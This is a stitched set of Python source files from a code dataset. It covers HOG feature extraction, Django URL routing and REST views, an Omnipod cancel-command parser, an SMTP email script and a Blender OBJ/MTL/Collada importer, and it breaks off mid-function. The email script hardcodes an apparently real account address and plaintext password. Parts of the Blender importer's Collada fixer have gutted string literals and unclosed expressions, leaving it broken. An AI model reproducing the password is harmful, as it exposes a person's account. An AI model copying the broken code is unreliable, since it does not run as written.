1)):\n mapp[(i+nearest[ii])*stringSize + (j+nearest[jj])*p + alfa[k*i+ii,j*k+jj,0]] += r[k*i+ii,j*k+jj] * w[ii,1] * w[jj,1]\n mapp[(i+nearest[ii])*stringSize + (j+nearest[jj])*p + alfa[k*i+ii,j*k+jj,1] + NUM_SECTOR] += r[k*i+ii,j*k+jj] * w[ii,1] * w[jj,1]\n return mapp\n\n@njit\n# normalization over the four neighbouring cells\ndef func3(partOfNorm, mappmap, sizeX, sizeY, p, xp, pp):\n\tnewData = np.zeros((sizeY*sizeX*pp), np.float32)\n\tfor i in range(1, sizeY+1):\n\t\tfor j in range(1, sizeX+1):\n\t\t\tpos1 = i * (sizeX+2) * xp + j * xp\n\t\t\tpos2 = (i-1) * sizeX * pp + (j-1) * pp\n\n\t\t\tvalOfNorm = np.sqrt(partOfNorm[(i )*(sizeX + 2) + (j )] +\n \t\t\t\tpartOfNorm[(i )*(sizeX + 2) + (j + 1)] +\n \t\t\t\tpartOfNorm[(i + 1)*(sizeX + 2) + (j )] +\n \t\t\t\tpartOfNorm[(i + 1)*(sizeX + 2) + (j + 1)]) + FLT_EPSILON\n\t\t\tnewData[pos2:pos2+p] = mappmap[pos1:pos1+p] / valOfNorm\n\t\t\tnewData[pos2+4*p:pos2+6*p] = mappmap[pos1+p:pos1+3*p] / valOfNorm\n\n\t\t\tvalOfNorm = np.sqrt(partOfNorm[(i )*(sizeX + 2) + (j )] +\n\t\t\t\t partOfNorm[(i )*(sizeX + 2) + (j + 1)] +\n\t\t\t\t partOfNorm[(i - 1)*(sizeX + 2) + (j )] +\n\t\t\t\t partOfNorm[(i - 1)*(sizeX + 2) + (j + 1)]) + FLT_EPSILON\n\t\t\tnewData[pos2+p:pos2+2*p] = mappmap[pos1:pos1+p] / valOfNorm\n\t\t\tnewData[pos2+6*p:pos2+8*p] = mappmap[pos1+p:pos1+3*p] / valOfNorm\n\n\t\t\tvalOfNorm = np.sqrt(partOfNorm[(i )*(sizeX + 2) + (j )] +\n\t\t\t\t partOfNorm[(i )*(sizeX + 2) + (j - 1)] +\n\t\t\t\t partOfNorm[(i + 1)*(sizeX + 2) + (j )] +\n\t\t\t\t partOfNorm[(i + 1)*(sizeX + 2) + (j - 1)]) + FLT_EPSILON\n\t\t\tnewData[pos2+2*p:pos2+3*p] = mappmap[pos1:pos1+p] / valOfNorm\n\t\t\tnewData[pos2+8*p:pos2+10*p] = mappmap[pos1+p:pos1+3*p] / valOfNorm\n\n\t\t\tvalOfNorm = np.sqrt(partOfNorm[(i )*(sizeX + 2) + (j )] +\n\t\t\t\t partOfNorm[(i )*(sizeX + 2) + (j - 1)] +\n\t\t\t\t partOfNorm[(i - 1)*(sizeX + 2) + (j )] +\n\t\t\t\t partOfNorm[(i - 1)*(sizeX + 2) + (j - 1)]) + FLT_EPSILON\n\t\t\tnewData[pos2+3*p:pos2+4*p] = mappmap[pos1:pos1+p] / valOfNorm\n\t\t\tnewData[pos2+10*p:pos2+12*p] = mappmap[pos1+p:pos1+3*p] / valOfNorm\n\treturn newData\n\n@njit\ndef func4(mappmap, p, sizeX, sizeY, pp, yp, xp, nx, ny):\n\tnewData = np.zeros((sizeX*sizeY*pp), np.float32)\n\tfor i in range(sizeY):\n\t\tfor j in range(sizeX):\n\t\t\tpos1 = (i*sizeX + j) * p\n\t\t\tpos2 = (i*sizeX + j) * pp\n\n\t\t\tfor jj in range(2 * xp): # 2*9 signed gradient bins\n\t\t\t\tnewData[pos2 + jj] = np.sum(mappmap[pos1 + yp*xp + jj : pos1 + 3*yp*xp + jj : 2*xp]) * ny\n\t\t\tfor jj in range(xp): # 9 unsigned bins\n\t\t\t\tnewData[pos2 + 2*xp 
+ jj] = np.sum(mappmap[pos1 + jj : pos1 + jj + yp*xp : xp]) * ny\n\t\t\tfor ii in range(yp): # 4 unsigned bins\n\t\t\t\tnewData[pos2 + 3*xp + ii] = np.sum(mappmap[pos1 + yp*xp + ii*xp*2 : pos1 + yp*xp + ii*xp*2 + 2*xp]) * nx\n\treturn newData\n\n\n\ndef getFeatureMaps(image, k, mapp):# k is the cell size; the returned map holds the features\n\tkernel = np.array([[-1., 0., 1.]], np.float32)\n\n\theight = image.shape[0]\n\twidth = image.shape[1]\n\t# the image must have 3 channels\n\tassert(image.ndim==3 and image.shape[2])\n\tnumChannels = 3\n\n\tsizeX = width // k\n\tsizeY = height // k\n\tpx = 3 * NUM_SECTOR\n\tp = px\n\tstringSize = sizeX * p\n\n\tmapp['sizeX'] = sizeX\n\tmapp['sizeY'] = sizeY\n\tmapp['numFeatures'] = p\n\tmapp['map'] = np.zeros((mapp['sizeX']*mapp['sizeY']*mapp['numFeatures']), np.float32)\n\t# gradients in the two directions\n\tdx = cv2.filter2D(np.float32(image), -1, kernel)\n\tdy = cv2.filter2D(np.float32(image), -1, kernel.T)\n # initialize the cos and sin tables\n\targ_vector = np.arange(NUM_SECTOR+1).astype(np.float32) * np.pi / NUM_SECTOR\n\tboundary_x = np.cos(arg_vector) \n\tboundary_y = np.sin(arg_vector)\n\n\t\n\t# compute the magnitude and orientation of the pixel gradients\n\tstime=time.time()\n\tr, alfa = func1(dx, dy, boundary_x, boundary_y, height, width, numChannels) #with @jit\n\tdtime=time.time()-stime\n\t# print('func1:{}s'.format(dtime))\n\tnearest = np.ones((k), np.int)\n\tnearest[0:k//2] = -1\n\n\tw = np.zeros((k, 2), np.float32)\n\ta_x = np.concatenate((k/2 - np.arange(k/2) - 0.5, np.arange(k/2,k) - k/2 + 0.5)).astype(np.float32)\n\tb_x = np.concatenate((k/2 + np.arange(k/2) + 0.5, -np.arange(k/2,k) + k/2 - 0.5 + k)).astype(np.float32)\n\tw[:, 0] = 1.0 / a_x * ((a_x*b_x) / (a_x+b_x))\n\tw[:, 1] = 1.0 / b_x * ((a_x*b_x) / (a_x+b_x))\n # prepare and run the gradient aggregation\n\tmapp['map'] = func2(dx, dy, boundary_x, boundary_y, r, alfa, nearest, w, k, height, width, sizeX, sizeY, p, stringSize) #with @jit\n\n\treturn mapp\n\n# normalization and truncation\ndef normalizeAndTruncate(mapp, alfa):\n\tsizeX = mapp['sizeX']\n\tsizeY = mapp['sizeY']\n\n\tp = NUM_SECTOR\n\txp = NUM_SECTOR * 3\n\tpp = NUM_SECTOR * 12\n\n\t'''\n\t### \n\tpartOfNorm = np.zeros((sizeY*sizeX), np.float32)\n\n\tfor i in range(sizeX*sizeY):\n\t\tpos = i * mapp['numFeatures']\n\t\tpartOfNorm[i] = np.sum(mapp['map'][pos:pos+p]**2) ###\n\t'''\n\t### \n\tidx = np.arange(0, sizeX*sizeY*mapp['numFeatures'], mapp['numFeatures']).reshape((sizeX*sizeY, 1)) + np.arange(p)\n\tpartOfNorm = np.sum(mapp['map'][idx] ** 2, axis=1) ### \n\n\tsizeX, sizeY = sizeX-2, sizeY-2\n\t\n\n\t\n\t### \n\tnewData = func3(partOfNorm, mapp['map'], sizeX, sizeY, p, xp, pp) \n\t###\n\n\t# \n\tnewData[newData > alfa] = alfa\n\n\tmapp['numFeatures'] = pp\n\tmapp['sizeX'] = sizeX\n\tmapp['sizeY'] = sizeY\n\tmapp['map'] = newData\n\n\treturn mapp\n\n\ndef PCAFeatureMaps(mapp):\n\tsizeX = mapp['sizeX']\n\tsizeY = mapp['sizeY']\n\n\tp = mapp['numFeatures']\n\tpp = NUM_SECTOR * 3 + 4\n\typ = 4\n\txp = NUM_SECTOR\n\n\tnx = 1.0 / np.sqrt(xp*2)\n\tny = 1.0 / np.sqrt(yp)\n\n\tnewData = func4(mapp['map'], p, sizeX, sizeY, pp, yp, xp, nx, ny) \n\t###\n\n\tmapp['numFeatures'] = pp\n\tmapp['map'] = newData\n\n\treturn mapp\n","sub_path":"FlapPyBird/fhog.py","file_name":"fhog.py","file_ext":"py","file_size_in_byte":8531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"309792795","text":"\"\"\"\nDefinition of urls for python_webapp_django.\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nfrom datetime import datetime\nfrom django.conf.urls import url\nimport 
django.contrib.auth.views\n\nimport app.forms\nimport app.views\nfrom django.contrib import admin\n# Uncomment the next lines to enable the admin:\n# from django.conf.urls import include\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = [\n # Examples:\n #SendAudioTrailer\n url(r'^statistics', app.views.statistics, name='statistics'), # <-- this one here\n url(r'^ajax/load_questions/', app.views.load_questions, name='load_questions'), # <-- this one here\n\n url(r'^ajax/load-cities/', app.views.load_cities, name='ajax_load_cities'), # <-- this one here\n url(r'^AshaAdd', app.views.ashaAdd, name='AshaAdd'),\n url(r'^ContentAdd', app.views.ContentAdd, name='ContentAdd'),\n url(r'^ShowAdd', app.views.ShowAdd, name='ShowAdd'),\n url(r'^TextMessageAdd', app.views.TextMessageAdd, name='TextMessageAdd'),\n url(r'^SendAudioTrailerAdd', app.views.SendAudioTrailerAdd, name='SendAudioTrailerAdd'),\n url(r'^ShowFeedbackAdd', app.views.ShowFeedbackAdd, name='ShowFeedbackAdd'),\n url(r'^ShowRecordingAdd', app.views.ShowRecordingAdd, name='ShowRecordingAdd'),\n\n url(r'^AudioFileAdd', app.views.AudioFileAdd, name='AudioFileAdd'),\n\n url(r'^ExpertAdd', app.views.ExpertAdd, name='ExpertAdd'),\n url(r'^CohortAdd', app.views.CohortAdd, name='CohortAdd'),\n url(r'^ContentCategoryAdd', app.views.ContentCategoryAdd, name='ContentCategoryAdd'),\n url(r'^$', app.views.home, name='home'),\n url(r'^contact$', app.views.contact, name='contact'),\n url(r'^about', app.views.about, name='about'),\n url(r'^admin', admin.site.urls),\n url(r'^profiles/(?P\\d+)/$', app.views.dashboard, name='lel'),\n url(r'^Asha', app.views.ashalist, name='Asha'),\n url(r'^Cohort', app.views.cohortlist, name='Cohort'),\n url(r'^RequestList', app.views.RequestList, name='RequestList'),\n url(r'^request/(?P\\d+)/$',app.views.request,name=\"requests\"),\n url(r'^request/(?P\\d+)/send_mail',app.views.sendmail,name=\"sendmail\"),\n url(r'^request/(?P\\d+)/deleteuser',app.views.deleteuser,name=\"deleteuser\"),\n\n url(r'^ReqSignUp$', app.views.signup_view2,\n {\n 'template_name': 'app/SignUpReq.html',\n\n },\n name='ReqSignUp'),\n\n url(r'^add/$',app.views.def_view, {'template_name': 'app/add.html',},name='def'),\n url(r'^signup2$',\n #django.contrib.auth.views.login,\n app.views.signup_view2,\n {\n 'template_name': 'app/signup.html',\n 'type':'signup2',\n },\n name='signup2'),\n url(r'^signup$',\n #django.contrib.auth.views.login,\n app.views.signup_view2,\n {\n 'template_name': 'app/SignUpReq.html',\n 'type':'signup2',\n\n\n },\n name='signup'),\n\n url(r'^signup3$',\n #django.contrib.auth.views.login,\n app.views.signup_view3,\n {\n 'template_name': 'app/signup.html',\n 'type':'signup3',\n\n\n },\n name='signup3'),\n\n url(r'^login/$',\n #django.contrib.auth.views.login,\n app.views.login_view,\n {\n 'template_name': 'app/login.html',\n #'authentication_form': app.forms.BootstrapAuthenticationForm,\n #'extra_context':\n },\n name='login'),\n url(r'^logout$',\n django.contrib.auth.views.logout,\n {\n 'next_page': '/',\n },\n name='logout'),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n]\n","sub_path":"python_webapp_django/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"470425719","text":"#-*- coding: 
utf-8 -*-\r\nfrom datetime import date\r\nimport re\r\nimport os\r\nimport smtplib\r\n\r\ntoday = str(date.today())\r\n\r\n# email info\r\ndestinatario = 'william@alunos.utfpr.edu.br'\r\ntexto = 'Teste de Crawler '\r\n\r\n# logging in to the email account\r\nremetente = 'william@alunos.utfpr.edu.br'\r\nsenha = 'Fzr07br!'\r\n# message for the email body\r\nmsg = '\\r\\n'.join([\r\n '%s' % texto + ' - ' + str(today)\r\n ])\r\n\r\n# sending the email\r\nserver = smtplib.SMTP('smtp.gmail.com:587')\r\nserver.starttls()\r\nserver.login(remetente,senha)\r\nserver.sendmail(remetente,destinatario,msg)\r\nserver.quit()\r\n","sub_path":"Crawler/SendEmail.py","file_name":"SendEmail.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"171480903","text":"# file: parse_1f - does the parsing for the cancel command\nfrom byteUtils import *\nfrom decimal import Decimal\n\ndef parse_1f(msg):\n # extract information from the 1f cancel command\n \"\"\"\n Command $1F is the Cancel command. It has the following format:\n\n OFF 1 2 3 4 5 6\n 1f 05 NNNNNNNN AX\n 1f 05 22c1cf8c 02 80f7\n\n 1f (1 byte): Mtype value of $1f specifies a cancel command\n 05 (1 byte): The cancel command always has a fixed length of 05\n NNNNNNNN (4 bytes): Nonce, the 32-bit validator (random looking numbers)\n AX (1 byte): Command byte of the form aaaa0bcd:\n The aaaa (A) nibble in the range of (0..8) and is the type of the Pod alarm/beep type to sound.\n An aaaa value = 0 is no alarm\n = 2 two quick beeps\n = 6 one longer beep\n Values of A larger than 8 are out of range and can lock up a Pod with a constant beep.\n The b ($04) bit being set will cancel any ongoing bolus and will turn off the RR reminder variables set from the $17 Bolus Extra command.\n The c ($02) bit being set will cancel any ongoing temporary basal and will turn off the RR reminder variables set from the $16 Temp Basal command.\n The d ($01) bit being set will cancel the basal program and will turn off the RR reminder variables set from the $13 Basal Schedule command.\n The Pod responds to the $1F command with a $1D status message.\n \"\"\"\n\n msgDict = { }\n msgDict['message_type'] = '1f'\n msgDict['raw_value'] = msg\n\n byteMsg = bytearray.fromhex(msg)\n byteList = list(byteMsg)\n mtype = byteList[0]\n mlen = byteList[1]\n nonce = combineByte(byteList[2:6])\n cancelByte = byteList[6]\n alertValue = (cancelByte >> 4) & 0xF\n cancelBolus = (cancelByte & 0x04) != 0\n cancelTB = (cancelByte & 0x02) != 0\n suspend = (cancelByte & 0x01) != 0\n\n msgDict = { }\n msgDict['message_type'] = '1f'\n msgDict['raw_value'] = msg\n msgDict['mtype'] = mtype\n msgDict['mlen'] = mlen\n msgDict['nonce'] = nonce\n msgDict['cancelByte'] = cancelByte\n msgDict['alertValue'] = alertValue\n msgDict['cancelBolus'] = cancelBolus\n msgDict['cancelTB'] = cancelTB\n msgDict['suspend'] = suspend\n\n return msgDict\n","sub_path":"parse_1f.py","file_name":"parse_1f.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"560472247","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom .models import Question\nfrom .serializers import QuestionSerializer\n\n\n@csrf_exempt\ndef questions(request):\n\n if request.method == 'GET':\n 
questions_list = Question.objects.all()\n serializer = QuestionSerializer(questions_list, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n if request.method == 'POST':\n data = JSONParser().parse(request)\n serializer = QuestionSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n\n\n@csrf_exempt\ndef question_detail(request, pk):\n try:\n question = Question.objects.get(pk=pk)\n except Question.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = QuestionSerializer(question)\n return JsonResponse(serializer.data)\n\n if request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = QuestionSerializer(question, data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data)\n return JsonResponse(serializer.errors, status=400)\n\n if request.method == 'DELETE':\n question.delete()\n return HttpResponse(status=204)\n\n","sub_path":"clucky/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"228111859","text":"import os\nimport time\nimport bpy\nimport mathutils\nimport platform\n\nSYS = platform.system()\n\nCurrentMat=''\n\n\ndef GenMapName(name):\n name=name.split('.')[0]\n if len(name) > 16:\n name=name.replace('a','').replace('e','').replace('i','').replace('o','').replace('u','')\n name=name.replace('A','').replace('E','').replace('I','').replace('O','').replace('U','')\n name=name.replace('_0','').replace('_','').replace('00','0').replace('00','0').replace('00','0')\n\n if len(name) > 16:\n v=0\n s=''\n for a in name:\n try:\n v+=int(float(a))\n except: \n s+=a\n \n s=s.replace('B','b').replace('C','c').replace('D','d').replace('F','f').replace('G','g')\n s=s.replace('H','h').replace('L','l').replace('M','m').replace('N','n').replace('P','p') \n s=s.replace('Q','q').replace('R','r').replace('S','s').replace('T','t').replace('V','v').replace('Z','z') \n \n s=s.replace('bb','b').replace('cc','c').replace('dd','d').replace('ff','f').replace('gg','g')\n s=s.replace('hh','h').replace('ll','l').replace('mm','m').replace('nn','n').replace('pp','p') \n s=s.replace('qq','q').replace('rr','r').replace('ss','s').replace('tt','t').replace('vv','v').replace('zz','z') \n \n name=\"N%sV%sS%s\" % (len(name),v,s)\n \n return name\n\n\n\ndef DelObj(obj):\n bpy.ops.object.select_name(name=obj.name)\n bpy.context.scene.objects.active = obj\n bpy.ops.object.delete()\n\n\n\ndef stripFile(path):\n lastSlash= max(path.rfind('\\\\'), path.rfind('/'))\n if lastSlash != -1:\n path= path[:lastSlash]\n return '%s%s' % (path, os.sep)\n\n\n\ndef rn(v):\n return \"%.1f\" % v\n\ndef crob(obj):\n sw=True\n for ob in bpy.context.scene.objects:\n if ob.name == obj:\n sw=False\n return sw\n\n\ndef stripPath(path):\n return path.split('/')[-1].split('\\\\')[-1]\n\ndef stripExt(name): \n index= name.rfind('.')\n if index != -1:\n return name[ : index ]\n else:\n return name\n\ndef unpack_list(list_of_tuples):\n l = []\n for t in list_of_tuples:\n l.extend(t)\n return l\n\ndef unpack_face_list(list_of_tuples):\n l = []\n for t in list_of_tuples:\n face = [i for i in t]\n if len(face) != 3 and len(face) != 4:\n raise RuntimeError(\"{0} vertices in face.\".format(len(face)))\n if len(face) == 4 and face[3] == 0:\n face = [face[3], face[0], face[1], face[2]]\n if len(face) == 
3:\n face.append(0)\n l.extend(face)\n return l\n\n\ndef line_value(line_split):\n length= len(line_split)\n if length == 1:\n return None\n elif length == 2:\n return line_split[1]\n elif length > 2:\n return ' '.join( line_split[1:] )\n\t\t\n\t\t\n\n\n\n\ndef strip_slash(line_split):\n if line_split[-1][-1]== '\\\\':\n if len(line_split[-1])==1:\n line_split.pop()\n else:\n line_split[-1]= line_split[-1][:-1]\n return True\n return False\n\ndef get_float_func(filepath):\n print(filepath)\n file= open(filepath, 'rU')\n for line in file: \n line = line.lstrip()\n if line.startswith('v'): \n if ',' in line:\n return lambda f: float(f.replace(',', '.'))\n elif '.' in line:\n return float\n return float \n\n\n\ndef load_image(imagepath, dirname):\n\n if os.path.exists(imagepath):\n return bpy.data.images.load(imagepath)\n\n variants = [os.path.join(dirname, imagepath), os.path.join(dirname, os.path.basename(imagepath))]\n\n for path in variants:\n if os.path.exists(path):\n return bpy.data.images.load(path)\n else:\n print(path, \"doesn't exist\")\n return None\n\n\n\n\n\ndef obj_image_load(imagepath, DIR, use_image_search):\n if b'_' in imagepath:\n image = load_image(imagepath.replace(b'_', b' '), DIR)\n if image:\n return image\n\n image = load_image(imagepath, DIR)\n if image:\n return image\n\n print(\"failed to load %r doesn't exist\" % imagepath)\n return None\n\n\n\n\ndef fixCollada(namefile):\n scene = bpy.context.scene\n SCL = scene.SCL \n fin= open(namefile, 'r')\n f= open(namefile.replace('.dae','_FIXED.dae'), 'w')\n sw=1\n sws=0\n swY=False\n for line in fin:\n if 'Y_UP' in line:\n line=line.replace('Y_UP','Z_UP')\n swY=True\n if '' in line: line='\\t1 0 0 0.000'\n if ''in line : \n line=''\n sw=1\n if ''in line : \n line=''\n sw=1\n if ''in line : \n line=''\n sw=1\n if '' in line : sws=0\n if sws==1:\n x=float(line.split()[0]) *SCL\n y=float(line.split()[1]) *SCL\n z=float(line.split()[2]) *SCL\n line=\"%s %s %s\\n\" % (x,y,z) \n if 'Position-array' in line and 'float_array' in line : sws=1\n if '')[1].split('%s %s %s\\n' % (x,y,z)\n if sw==1: f.write(line)\n f.close()\n fin.close()\n\n\t\n\t\n\t\ndef create_materials(filepath,context_material):\n print(' INFO: Start Make Mapping '+ context_material.name)\n DIR= stripFile(filepath)\n material_libs= []\n unique_materials= {}\n unique_material_images= {}\n\n def setMap(mapping,slot):\n if '|' in mapping:\n map = mapping.split('|')[1]\n map=map.split(' ')\n \n if len(map)>0:\n if map[0] == '1':\n slot.extension = 'CLIP'\n slot.use_mirror_x = int(float(map[1]))\n slot.use_mirror_y = int(float(map[2]))\n slot.repeat_x = int(float(map[5]))\n slot.repeat_y = int(float(map[6]))\n slot.use_flip_axis = int(float(map[7]))\n slot.use_alpha = int(float(map[9]))\n slot.invert_alpha = int(float(map[10]))\n\n\n\n def load_material_image(blender_material, context_material_name, imagepath, type, mapping,DIR):\n\n import platform\n SYS = platform.system()\n Nt=True\n path=imagepath.split('|')[0]\n has_data = False\n \n textNameType=GenMapName(path)\n \n textNameType=type+'_'+textNameType\n \n \n #### TROVAMI MAP\n sw=True\n for t in blender_material.texture_slots:\n if t and t.texture.type == 'IMAGE' : \n if textNameType==t.name.split('.')[0]:\n print(' INFO: Start Textures Find '+t.name.split('.')[0])\n try:\n texture=t\n has_data = t.texture.image.has_data\n image=t.texture.image\n texture=t.texture\n mtex=t\n sw=False\n except: pass\n\n\n if sw:\n texture = bpy.data.textures.new(name=textNameType, type='IMAGE')\n image = load_image(path, 
DIR.replace('Materials','Textures'))\n \n\n\n print(DIR.replace('Materials','Textures')+path)\n \n if image and os.path.isfile(DIR.replace('Materials','Textures')+path):\n texture.image = image\n has_data = image.has_data\n\n\n\n if type == 'Kd':\n if has_data and image.depth == 32:\n if sw: mtex = blender_material.texture_slots.add()\n mtex.texture = texture\n mtex.texture_coords = 'UV'\n mtex.use_map_color_diffuse = True\n mtex.use_map_alpha = True\n\n texture.use_mipmap = True\n texture.use_interpolation = True\n texture.use_alpha = True\n #blender_material.use_transparency = True\n blender_material.alpha = 0.0\n else:\n if sw: \n mtex = blender_material.texture_slots.add()\n mtex.texture = texture\n mtex.texture_coords = 'UV'\n mtex.use_map_color_diffuse = True\n\n setMap(mapping,mtex.texture)\n\n if image: unique_material_images[context_material_name] = image, has_data \n\n elif type == 'Ka':\n if sw: mtex = blender_material.texture_slots.add()\n mtex.use_map_color_diffuse = False\n\n mtex.texture = texture\n mtex.texture_coords = 'UV'\n mtex.use_map_ambient = True\n\n elif type == 'Ks':\n if sw: mtex = blender_material.texture_slots.add()\n mtex.use_map_color_diffuse = False\n\n mtex.texture = texture\n mtex.texture_coords = 'UV'\n mtex.use_map_specular = True\n setMap(mapping,mtex.texture)\n\n elif type == 'Bump':\n if sw: mtex = blender_material.texture_slots.add()\n mtex.use_map_color_diffuse = False\n\n mtex.texture = texture\n mtex.texture_coords = 'UV'\n mtex.use_map_normal = True\n setMap(mapping,mtex.texture)\n\n elif type == 'D':\n if sw: mtex = blender_material.texture_slots.add()\n mtex.use_map_color_diffuse = False\n\n mtex.texture = texture\n mtex.texture_coords = 'UV'\n mtex.use_map_alpha = True\n #blender_material.use_transparency = True\n #blender_material.transparency_method = 'Z_TRANSPARENCY'\n blender_material.alpha = 0.0\n setMap(mapping,mtex.texture)\n\n elif type == 'refl':\n if sw: mtex = blender_material.texture_slots.add()\n mtex.use_map_color_diffuse = False\n\n mtex.texture = texture\n mtex.texture_coords = 'UV'\n mtex.use_map_reflect = True\n setMap(mapping,mtex.texture)\n\n else:\n raise Exception(\"invalid type %r\" % type)\n\n\n try:\n \n map = mapping.split('|')[1]\n map=map.split(' ')\n if len(map)>0:\n print('>>>>>>>>>>>>>>>>SUPERFLUO<<<<<<<<<<<<<')\n if map[0] == '1':\n texture.extension = 'clip'\n print(texture.extension)\n texture.mirror_x = map[1]\n texture.mirror_y = map[2]\n texture.repeat_x = map[3]\n texture.repeat_y = map[4]\n mapping_sX = map[5]\n mapping_sY = map[6]\n mapping_flipXY = map[7]\n img_h = map[8]\n img_alpha = map[9]\n img_alpha_neg = map[10]\n texture\n \n except:print(\"---------TEXTURE ERROR--------------\")\n\n\n\n mtl= open(filepath, 'r')\n \n for line in mtl:\n if line.startswith('newmtl'):\n matName = line_value(line.split())\n #print(matName+' '+ context_material.name) \n context_material_name=context_material.name \n \n #if context_material_name==matName : pass\n \n\n \n line_split= line.split()\n line_lower= (line.lower().lstrip()).replace('\\t','')\n if line_lower.startswith('ka'):\n try:\n context_material.mirror_color=(float(line_split[1]),float(line_split[2]),float(line_split[3]))\n except:()\n elif line_lower.startswith('kd'):\n try:\n context_material.diffuse_color=(float(line_split[1]),float(line_split[2]),float(line_split[3]))\n\n except:()\n elif line_lower.startswith('ks'):\n try:\n context_material.specular_color=(float(line_split[1]),float(line_split[2]),float(line_split[3]))\n except:()\n elif 
line_lower.startswith('ns'):\n context_material.specular_hardness = int((float(line_split[1])*0.51))\n elif line_lower.startswith('ray_reflect'):\n \n if float(line_split[1]) > 0.001: \n context_material.raytrace_mirror.use=True\n context_material.raytrace_mirror.reflect_factor = float(line_split[1])\n elif line_lower.startswith('reflect_blur'):\n \n context_material.raytrace_mirror.gloss_factor = float(line_split[1])\n\n elif line_lower.startswith('reflect_samples'):\n context_material.raytrace_mirror.gloss_samples = int(float(line_split[1]))\n elif line_lower.startswith('reflect_depth'):\n context_material.raytrace_mirror.depth = int(float(line_split[1]))\n elif line_lower.startswith('reflect_maxdist'):\n context_material.raytrace_mirror.distance = int(float(line_split[1]))\n elif line_lower.startswith('reflect_anisotropic'):\n context_material.raytrace_mirror.anisotropic = float(line_split[1])\n elif line_lower.startswith('ray_refract'):\n ray_refract=float(line_split[1])\n if ray_refract > 0.001: \n context_material.use_transparency=True\n\n context_material.transparency_method = 'RAYTRACE'\n \n context_material.alpha= 1 - ray_refract\n context_material.specular_alpha= 1 - ray_refract # (ray_refract-(ray_refract *2))+1\n context_material.alpha=context_material.specular_alpha\n context_material.raytrace_transparency.fresnel=ray_refract*5\n context_material.raytrace_transparency.fresnel_factor=(ray_refract*4)+1\n context_material.raytrace_transparency.fresnel_factor = float(line_split[1])\n elif line_lower.startswith('ni'):\n context_material.raytrace_transparency.ior = max(1, min(float(line_split[1]), 3))\n elif line_lower.startswith('refract_blur'):\n context_material.raytrace_transparency.gloss_factor = float(line_split[1])\n elif line_lower.startswith('refract_samples'):\n context_material.raytrace_transparency.gloss_samples = int(float(line_split[1]))\n elif line_lower.startswith('refract_depth'):\n context_material.raytrace_transparency.depth = int(float(line_split[1]))\n elif line_lower.startswith('refract_limit'):\n context_material.raytrace_transparency.limit = int(float(line_split[1]))\n elif line_lower.startswith('translucency'):\n context_material.translucency = float(line_split[1])\n elif line_lower.startswith('emit'):\n context_material.emit = float(line_split[1])\n elif line_lower.startswith('sss_scale'):\n context_material.subsurface_scattering.scale = float(line_split[1])\n elif line_lower.startswith('sss_color'):\n context_material.subsurface_scattering.color=(float(line_split[1]),float(line_split[2]),float(line_split[3]))\n elif line_lower.startswith('shader'):\n context_material.diffuse_shader = line_split[1]\n elif line_lower.startswith('roughness'):\n context_material.roughness = float(line_split[1])\n ### texture\n elif line_lower.startswith('d') or line_lower.startswith('tr'):\n context_material.alpha = float(line_split[1])\n elif line_lower.startswith('map_ka'):\n img_filepath= line_value(line.split())\n\n if img_filepath.split('|')[0]:\n load_material_image(context_material,context_material_name,img_filepath,'Ka',line_lower,DIR)\n elif line_lower.startswith('map_ks'):\n img_filepath= line_value(line.split())\n if img_filepath:\n load_material_image(context_material,context_material_name,img_filepath,'Ks',line_lower,DIR)\n elif line_lower.startswith('map_kd'):\n img_filepath= line_value(line.split())\n if img_filepath.split('|')[0]:\n\n load_material_image(context_material,context_material_name,img_filepath,'Kd',line_lower,DIR)\n elif 
line_lower.startswith('map_bump'):\n img_filepath= line_value(line.split())\n \n if img_filepath.split('|')[0]:\n load_material_image(context_material,context_material_name,img_filepath,'Bump',line_lower,DIR)\n elif line_lower.startswith('map_displ'):\n img_filepath= line_value(line.split())\n if img_filepath.split('|')[0]:\n \n load_material_image(context_material,context_material_name,img_filepath,'Disp',line_lower,DIR)\n elif line_lower.startswith('map_d') or line_lower.startswith('map_tr'): \n img_filepath= line_value(line.split())\n \n if img_filepath.split('|')[0]:\n load_material_image(context_material,context_material_name,img_filepath,'D',line_lower,DIR)\n elif line_lower.startswith('refl'):\n img_filepath= line_value(line.split())\n if img_filepath:\n load_material_image(context_material,context_material_name,img_filepath,'refl',line_lower,DIR)\n mtl.close()\n\t\n\t\n\n\n\t\n\t\ndef load_Scn(filepath):\n print(' INFO: Start Interchange ')\n from math import pi\n scene = bpy.context.scene\n SCL = scene.SCL #/ 10\n makeNew=False\n makeCamNew=False\n l_from=None\n l_type=None\n l_rot=None\n l_color=None\n l_power=None\n l_name=None\n context_lamp=None\n mtl= open(filepath, 'r')\n\n\n \n \n\n def load_light_image(lamp,imagepath,sname):\n print(\" INFO: fiind texture Light\")\n DIR= stripFile(filepath)\n Nt=True\n ies=False\n for t in bpy.data.textures:\n if t:\n try:\n if t.name.split('.')[0] == sname : Nt=False\n texture=t\n except:\n Nt=False\n\n if Nt:\n \n\n if str(imagepath) != '1': \n 